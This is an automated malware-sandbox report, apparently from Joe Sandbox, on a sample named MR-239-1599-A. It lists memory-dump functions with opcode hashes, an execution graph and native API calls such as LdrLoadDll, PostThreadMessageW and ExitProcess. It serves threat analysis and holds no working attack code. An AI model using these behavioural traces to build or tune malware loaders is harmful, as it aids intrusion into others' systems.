                                                                                                                                                                                                          Function 0776AB60 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4b115277876a0fdfe31acb228c01478224dc851313b810e5253f9dbe18d484f8
                                                                                                                                                                                                          • Instruction ID: 2704075c01e864877761582f0f46d31c818f86d74c44dfe2b7b39473b433941b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b115277876a0fdfe31acb228c01478224dc851313b810e5253f9dbe18d484f8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1EA3592075A9ACB10EFA4D950A9DB771FFA6300F10C79AD50A37264EF70AAC5CF81
                                                                                                                                                                                                          Function 02B0CB7C Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a0589ee099c7dfe4e06203a41827ed6cd30245e0a5f767fe91ad91b9753e4bbe
                                                                                                                                                                                                          • Instruction ID: 8d73917a5e759b32de8537bee67950495082792727910134de630e217d7c7141
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0589ee099c7dfe4e06203a41827ed6cd30245e0a5f767fe91ad91b9753e4bbe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27A18336E00209CFCF0ADFB4C58459EBBB2FF85304B1549AAE905AB2A1DB71E955CF50
                                                                                                                                                                                                          Function 02B0F3EB Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d44556ea1613a0f96ea8d1769f1ce5ff06a3ac244371cf61c7479aebf7383350
                                                                                                                                                                                                          • Instruction ID: 00461ac10e86860eb9b9467daedd35678ee0e98ea784a70a075c3c2713568585
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d44556ea1613a0f96ea8d1769f1ce5ff06a3ac244371cf61c7479aebf7383350
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75C10CB0D80B458BD710DF65EA5E3897BB1FBCA398F904B09D1616B2D0DBB414AACF44
                                                                                                                                                                                                          Function 0776C0B0 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 46a75830e3ab858f2f92c0b9832235e7a21df2804491f19a174ed817a7e6e35e
                                                                                                                                                                                                          • Instruction ID: 709f9dacab8c146175006f85ff608cb27fa2a18ccc68182be27e306f33df6437
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46a75830e3ab858f2f92c0b9832235e7a21df2804491f19a174ed817a7e6e35e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB51E7B4E051198FCB08DFAAD5849AEFBF2BF88300F14D525D819A7359DB34A941CFA0
                                                                                                                                                                                                          Function 07760040 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b7f14ebbdb4b6f8fd1404f45e82d6cf4dacc926518fc6428395fee6ea3e5760e
                                                                                                                                                                                                          • Instruction ID: 825ddb03930f072fea24fd3dd57ffe13f43ce47af797c5d1f92318cfaf32adc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f14ebbdb4b6f8fd1404f45e82d6cf4dacc926518fc6428395fee6ea3e5760e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA5175B4D016188BEB68CF2AD95479DBAF3AFC9300F14C5EAD40DA7264EB750A95CF40
                                                                                                                                                                                                          Function 07760007 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 576deb5fae00167dbffc079c3b190f30bc7997f661f1f2b78aa2441d9659f60f
                                                                                                                                                                                                          • Instruction ID: 63fd2fc18424ce6566c829c5cd18c1e3b266f34b7b856ded1f08586c4bf98d20
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 576deb5fae00167dbffc079c3b190f30bc7997f661f1f2b78aa2441d9659f60f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41ECB1D057598BEB29CF6BD84478ABBF3AFC9210F18C0E6C448AB165DB750985CF50

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:1.2%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                                                                          Signature Coverage:7.5%
                                                                                                                                                                                                          Total number of Nodes:146
                                                                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                                                                          execution_graph 91392 42a863 91393 42a880 91392->91393 91396 1532df0 LdrInitializeThunk 91393->91396 91394 42a8a8 91396->91394 91397 4243e3 91401 4243f2 91397->91401 91398 424436 91405 42d113 91398->91405 91401->91398 91402 424471 91401->91402 91404 424476 91401->91404 91403 42d113 RtlFreeHeap 91402->91403 91403->91404 91408 42b5a3 91405->91408 91407 424443 91409 42b5bd 91408->91409 91410 42b5ce RtlFreeHeap 91409->91410 91410->91407 91411 424053 91412 42406f 91411->91412 91413 424097 91412->91413 91414 4240ab 91412->91414 91416 42b233 NtClose 91413->91416 91421 42b233 91414->91421 91417 4240a0 91416->91417 91418 4240b4 91424 42d233 RtlAllocateHeap 91418->91424 91420 4240bf 91422 42b250 91421->91422 91423 42b261 NtClose 91422->91423 91423->91418 91424->91420 91425 42e1f3 91426 42e203 91425->91426 91427 42e209 91425->91427 91430 42d1f3 91427->91430 91429 42e22f 91433 42b553 91430->91433 91432 42d20e 91432->91429 91434 42b570 91433->91434 91435 42b581 RtlAllocateHeap 91434->91435 91435->91432 91436 413c73 91437 413c8d 91436->91437 91442 417673 91437->91442 91439 413cab 91440 413cf0 91439->91440 91441 413cdf PostThreadMessageW 91439->91441 91441->91440 91443 417697 91442->91443 91444 4176d3 LdrLoadDll 91443->91444 91445 41769e 91443->91445 91444->91445 91445->91439 91446 41acd3 91447 41ad17 91446->91447 91448 41ad38 91447->91448 91449 42b233 NtClose 91447->91449 91449->91448 91450 41ddf3 91451 41de19 91450->91451 91455 41df07 91451->91455 91456 42e323 91451->91456 91453 41deab 91453->91455 91462 42a8b3 91453->91462 91457 42e293 91456->91457 91458 42d1f3 RtlAllocateHeap 91457->91458 91459 42e2f0 91457->91459 91460 42e2cd 91458->91460 91459->91453 91461 42d113 RtlFreeHeap 91460->91461 91461->91459 91463 42a8d0 91462->91463 91466 1532c0a 91463->91466 91464 42a8fc 91464->91455 91467 1532c11 91466->91467 91468 1532c1f LdrInitializeThunk 91466->91468 91467->91464 91468->91464 91469 1532b60 LdrInitializeThunk 91470 401ab8 91471 401ad5 91470->91471 91474 42e6b3 91471->91474 91477 42cd13 91474->91477 91478 42cd36 91477->91478 91489 407243 91478->91489 91480 42cd4c 91488 401b45 91480->91488 91492 41aae3 91480->91492 91482 42cd6b 91483 42cd80 91482->91483 91507 42b5f3 91482->91507 91503 427303 91483->91503 91486 42cd8f 91487 42b5f3 ExitProcess 91486->91487 91487->91488 91510 4163a3 91489->91510 91491 407250 91491->91480 91493 41ab0f 91492->91493 91521 41a9d3 91493->91521 91496 41ab54 91499 42b233 NtClose 91496->91499 91500 41ab70 91496->91500 91497 41ab3c 91498 42b233 NtClose 91497->91498 91501 41ab47 91497->91501 91498->91501 91502 41ab66 91499->91502 91500->91482 91501->91482 91502->91482 91504 42735d 91503->91504 91506 42736a 91504->91506 91532 4181c3 91504->91532 91506->91486 91508 42b610 91507->91508 91509 42b621 ExitProcess 91508->91509 91509->91483 91511 4163ba 91510->91511 91513 4163d3 91511->91513 91514 42bc93 91511->91514 91513->91491 91516 42bcab 91514->91516 91515 42bccf 91515->91513 91516->91515 91517 42a8b3 LdrInitializeThunk 91516->91517 91518 42bd24 91517->91518 91519 42d113 RtlFreeHeap 91518->91519 91520 42bd39 91519->91520 91520->91513 91522 41a9ed 91521->91522 91526 41aac9 91521->91526 91527 42a953 91522->91527 91525 42b233 NtClose 91525->91526 91526->91496 91526->91497 91528 42a970 91527->91528 91531 15335c0 LdrInitializeThunk 91528->91531 91529 41aabd 91529->91525 91531->91529 91533 4181ed 91532->91533 91539 41865b 91533->91539 91540 413da3 91533->91540 91535 4182fa 91536 42d113 RtlFreeHeap 91535->91536 91535->91539 91537 418312 91536->91537 91538 42b5f3 ExitProcess 91537->91538 91537->91539 91538->91539 91539->91506 91541 413dc2 91540->91541 91542 413f17 91541->91542 91548 413ee0 91541->91548 91549 4137f3 LdrInitializeThunk 91541->91549 91542->91535 91545 41adf3 3 API calls 91546 413f0d 91545->91546 91546->91535 91548->91542 91550 41adf3 91548->91550 91549->91548 91551 41ae18 91550->91551 91557 428953 91551->91557 91553 41ae3e 91554 413ef4 91553->91554 91556 42d113 RtlFreeHeap 91553->91556 91562 41ac33 LdrInitializeThunk 91553->91562 91554->91542 91554->91545 91556->91553 91558 4289b0 91557->91558 91559 4289e3 91558->91559 91563 413833 91558->91563 91559->91553 91561 4289c5 91561->91553 91562->91553 91564 4137f8 91563->91564 91565 413847 91563->91565 91568 42b4b3 91564->91568 91565->91561 91569 42b4cd 91568->91569 91572 1532c70 LdrInitializeThunk 91569->91572 91570 413815 91570->91561 91572->91570 91573 418878 91574 42b233 NtClose 91573->91574 91575 418882 91574->91575

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00417673 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                                                          • Instruction ID: 63ddb307992d993e20b5758824dbbb23b6c5c0d885c371cecfd37f145fc1fc2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48011EB5E4020DABDF10DAE5DC42FDEB7789B54308F0081AAE90897240FA35EB548B95
                                                                                                                                                                                                          Function 0042B233 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                                                          • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                                                          • Instruction ID: da727019d85e71b4f98dc3c04865d8d3d54acb7ac2c2c1eb56f854e5711b10c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE04676640214BBC220AAAADC41FAB776CEFC6714F00402AFA0CA7242C6B4B90187F5
                                                                                                                                                                                                          Function 01532B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 367 1532b60-1532b6c LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                                                                                                                                                                                          • Instruction ID: 7abd6c26aeca4f84cc7d15c94a930a4b7683e83ed4c4a65aeb9e29f810bb3e14
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D90027120240003410571994414616405AA7E0215B59C421E1014990DC5B589916225
                                                                                                                                                                                                          Function 01532DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 369 1532df0-1532dfc LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                                                                                                                                                          • Instruction ID: 78ac999c06f632d88473396045dbbff633e11e930c292c5eddadabd236447928
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B490023120140413D111719945047070059A7D0255F99C812A0424958DD6E68A52A221
                                                                                                                                                                                                          Function 01532C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 368 1532c70-1532c7c LdrInitializeThunk
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                                                                                                                                                                                          • Instruction ID: 6a7380860f71c200e04d7e2d7e28ef8f4f64b0a32e2b3c5d42c8c20806c9838f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE90023120148803D1107199840474A0055A7D0315F5DC811A4424A58DC6E589917221
                                                                                                                                                                                                          Function 015335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                                                                                                                                                          • Instruction ID: e8eff1221dcd7d2881a9ded410edc22ad766255445d6eef6db93c42cd6e87432
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1690023160550403D100719945147061055A7D0215F69C811A0424968DC7E58A5166A2
                                                                                                                                                                                                          Function 00413C6C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077
                                                                                                                                                                                                          • Opcode ID: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                                                                                          • Instruction ID: 5a9376cf19c71376eb6dcd9ad07240282008403dba884ccb0a10c61fd27c35d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5e35cfe8e6516f02c30a3443cc0ee0ee5b1e7cc6392967cd808f54fb56ba87c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B114872D0415C7AEB10ABE59C82DEFBB7CDF406A8F048069FE1077141D5685F0687E5
                                                                                                                                                                                                          Function 00413C73 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077
                                                                                                                                                                                                          • Opcode ID: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                                                                                          • Instruction ID: 4273e9db8a055284bf7aad7e038a2b9a4781de0a78bbed76330aa2944e199f6c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6288d2ea1272a214756263fac976e8fff6842ae45e043216bf19d7adf1833ff7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC0104B2D0011C7AEB10ABE59C82DEFBB7CDF40698F058069FA14B7241D5685F068BE5
                                                                                                                                                                                                          Function 0042B5A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID: !dA
                                                                                                                                                                                                          • API String ID: 3298025750-3330550368
                                                                                                                                                                                                          • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                                                          • Instruction ID: 28da6497efbab91fddcaddee6dcc59dcba5a5150a74096bf66e05214206e21d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E06DB2640208BBD610EE99DC41EAB33ACEFCA710F000019F909A7242C670B9108AB9
                                                                                                                                                                                                          Function 0042B553 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                                                          • Instruction ID: 1e45151d5ae518e03348f57204b76deaae3a37f6371d957f2058fa57962241ea
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E06DB1604244BBD614EE99DC41EAF37ACEFC6710F000019F908A7242C670B91086B9
                                                                                                                                                                                                          Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                          • Opcode ID: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                                                                                          • Instruction ID: 5260f22870e994c6374de7522158ff438fff32bc85833648b073e817e0388f48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2759363570b55ec80a9c2bbdb714e3a733575c6f342d5e77988da5f6202b6134
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE04F72600214BBD220AA6ADC41F9B775CDFC5714F004469FA0CA7246CAB5B90186B4
                                                                                                                                                                                                          Function 01532C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
